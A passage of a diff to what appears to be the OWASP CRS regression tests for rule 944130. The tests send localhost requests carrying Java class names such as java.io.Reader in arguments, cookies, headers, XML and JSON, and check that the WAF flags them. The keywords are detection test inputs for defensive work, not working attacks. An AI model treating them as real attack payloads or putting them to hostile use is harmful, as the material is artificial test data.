Content-Type: "application/x-www-form-urlencoded" - test: java.io.PushbackInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-237 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PushbackInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 237 desc: "XML attribute value includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-238 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 238 desc: "XML element value includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-239 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream" + output: + log: + expect_ids: [944130] + - test_id: 239 desc: "Nested XML element value includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-240 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream" + output: + log: + expect_ids: [944130] + - test_id: 240 desc: "Content-Type text/plain includes keyword java.io.PushbackInputStream" stages: 
- - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-241 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PushbackInputStream" + output: + log: + expect_ids: [944130] + - test_id: 241 desc: "Content-Type application/json arg value includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PushbackInputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-242 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: 
"{\"test\": \"java.io.PushbackInputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 242 desc: "Content-Type application/json arg name includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.PushbackInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-243 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.PushbackInputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 243 desc: "Argument test includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.Reader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-244 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.Reader" + output: + log: + expect_ids: [944130] + - test_id: 244 desc: "Argument name includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.Reader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-245 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.Reader=test" + output: + log: + expect_ids: [944130] + - test_id: 245 desc: "Cookie test includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.Reader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - 
test_title: 944130-246 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.Reader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 246 desc: "Cookie name includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.Reader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-247 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.Reader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 247 desc: "Request header test includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.Reader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-248 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.Reader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 248 desc: "XML attribute value includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-249 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 249 desc: "XML element value includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.Reader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-250 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.Reader" + output: + log: + expect_ids: [944130] + - test_id: 250 desc: "Nested XML element value includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.Reader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-251 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.Reader" + output: + log: + expect_ids: [944130] + - test_id: 251 desc: "Content-Type text/plain includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.Reader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-252 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.Reader" + output: + log: + expect_ids: [944130] + - test_id: 252 desc: "Content-Type application/json arg value includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.Reader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-253 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.Reader\"}" + output: + log: + expect_ids: [944130] + - test_id: 253 desc: "Content-Type application/json arg 
name includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.Reader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-254 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.Reader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 254 desc: "Argument test includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.StringReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-255 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: 
"/post" + version: "HTTP/1.0" + data: "test=java.io.StringReader" + output: + log: + expect_ids: [944130] + - test_id: 255 desc: "Argument name includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.StringReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-256 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.StringReader=test" + output: + log: + expect_ids: [944130] + - test_id: 256 desc: "Cookie test includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.StringReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-257 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.StringReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 257 desc: "Cookie name includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.StringReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-258 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.StringReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 258 desc: "Request header test includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.StringReader - method: "POST" - uri: 
"/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-259 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.StringReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 259 desc: "XML attribute value includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-260 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 260 desc: "XML element value includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" 
- Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.StringReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-261 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.StringReader" + output: + log: + expect_ids: [944130] + - test_id: 261 desc: "Nested XML element value includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.StringReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-262 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.StringReader" + output: + log: + expect_ids: [944130] + - test_id: 262 desc: "Content-Type text/plain includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.StringReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-263 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.StringReader" + output: + log: + expect_ids: [944130] + - test_id: 263 desc: "Content-Type application/json arg value includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.StringReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-264 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.StringReader\"}" + output: + log: + expect_ids: [944130] + - test_id: 264 desc: "Content-Type application/json arg name includes keyword 
java.io.StringReader"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "{\"java.io.StringReader\": \"test\"}"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-265
+ - input:
